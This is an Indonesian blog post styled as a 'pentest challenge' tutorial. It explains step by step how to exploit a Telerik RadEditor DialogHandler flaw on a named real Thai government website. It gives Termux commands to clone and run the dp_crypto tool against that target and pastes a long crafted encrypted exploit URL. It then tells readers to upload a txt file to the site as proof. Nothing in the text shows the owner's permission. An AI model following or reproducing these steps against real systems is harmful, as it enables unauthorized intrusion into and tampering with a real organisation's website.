Challenge Pentest

Fake Friends
Fake Friends
Januari 16, 2021

 



Assalamu'alaikum kembali lagi bersama gua Haidar Ganss

Kali ini saya membagikan tutorial bagaimana cara menyelesaikan challenge pentest up txt Site: https://www.dft.go.th/ kerentanan di website tersebut adalah BUG RCE atau kadang di sebut dengan REMOTE CODE EXECUTION bagaimana? Cara mengeksploitasinya? Cukup mudah dan simple tinggal masukkan exploit di belakang website tersebut 

Contoh:https://www.dft.go.th//DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx

Salin semuanya dan buka di browser kalian masing-masing kalo tampilan di bawah berarti bisa

Dan masuk ke termux ketikan command dibawah:

$pkg install git -y

$pkg install pip

$git clone https://github.com/bao7uo/dp_crypto

$cd dp_crypto

$python3 dp_crypto.py k -u (masukkan website targetnya beserta Exploit nya)

Dan ketikan python3 dp_crypto.py k -u https://www.dft.go.th//DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx(Masukan Target+exploit)

Dan enter tunggu sampe selesai

Kalo udah selesai copy semua dan paste di browser kalian

Contoh : https://www.domain.com//DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx?DialogName=DocumentManager&renderMode=2&Skin=Default&Title=Document%20Manager&dpptn=&isRtl=false&dp=ZBMGXRhbSFRjYXtzUS4KYVJ1TkUfbmE3ZVQHNVIGFDd8PzwUIFZnVHoFZVRaBmQAbBJxXSVxWEJ+f2c/VxQRRHxxTlIkbn1xYn8PclNiMXJ8Ai92EW8EUGxYT1RqFgNZbBNhXhthYntrYXsqZnAWAlN1YEknfmYoU3o5AWhjOT5rFTM7D35jQVFiYg9tLGRFbANlTBVhCVNoak0BahQ8TWthQUoKfXlzYWEDNVMGBy9kAQJxInB8S2N9fQliEkVHegJDQRhMXGlnbg1/fHIKW2hqfFknf3IsU3ETKlJZdD59ABY4J29kS3h2T2x1LEFHb3V2DBFiRH5QVHMvUQQScVNlfF8cfmIobX8PNFBjdD59Ax4pIXB/VHlxektuCXgBbBBHexhuWG5Rfk0wahQWcFBlTl8TC1xybWo5AWhjOT5rFTM5D3x4T3txUE91BUZ9VHZ9XSNxXA5rYWc2UXFxZmhqZFwKfGosVXEPKn1wADd+dh4xIX9ne1ZYDgtbc2RJZ3YKQCVxZk1Wf3c/UXAeR2t1YEoQcVwzbWx0LlNjFDdjKwIyIApkS3h2QA9uLF5cUnVxXSVxWEJ+f2c/VxQRRHxxTlIkbn1xYn8HMGFgNQ5SdwozIm8EbVcGYVJZAkp3bxNLTxtlR0J+fG8uUQsKW34CYAcifmY9VVQHNWNzLSxTAX0vIAlzUFFyUEtqLHRDVXZmRgx1Rw9mfnMzaXASX2sAY0AUVHY3VAsUNXx3OSVnPBZxFVRrdmVhQ21iFkpcVSlfRw1dYkhrbk0waXMWW2tfWkYnYWI0VQt1M2NzLSxTAX0vFXBdT29gAlBaFmdDZCl1RiIEZUt/ek0RYXIeTWZeXnglfnZxeW8pJ2cELXVnKhIzJ257YGBbdVNqO14FYgNHZiJwXGBXcW8nfgZxBWhfA2Ajbnk9UnExC1AFC3ZmEgoWJ35BYHthdW1ucWgBYRJXXiNxfkpnV3ccZXAsBWZcWgAcCGoMYVcPJ2ZxMTNoHi9wFH5BYGZtYW9uFkZKZRFpVCNxfk1mV3cvfikVAmVlRnEjfAFxeXEtC1BZD3BlKChyGQl0QmNbeVNrB2gFYShiTSVgQGFkU3csURYeTWV3eHATbmIcZFcPLmcEdAlmKiwyFW94QVFyT1FZK3AEYhNDciNgXGBkbXsWYQYRTmVeUngnfAA9Ym0AcWBjOTdTdSAPJ29JCFRtdUtiF3xcVANlXyVxXE5QUE0BahQ8TWthQUkKfGosVXEPKg==


Dan cari tanda uploads trs Upload file ber ekstensi txt dan cara manggil?

https://www.dft.go.th/solped.txt


Terimakasih 


Lihat gambar di bawah

Dan cari tanda uploads trs Upload file ber ekstensi txt dan cara manggil?
https://www.dft.go.th/solped.txt

Terimakasih

Lihat gambar di bawah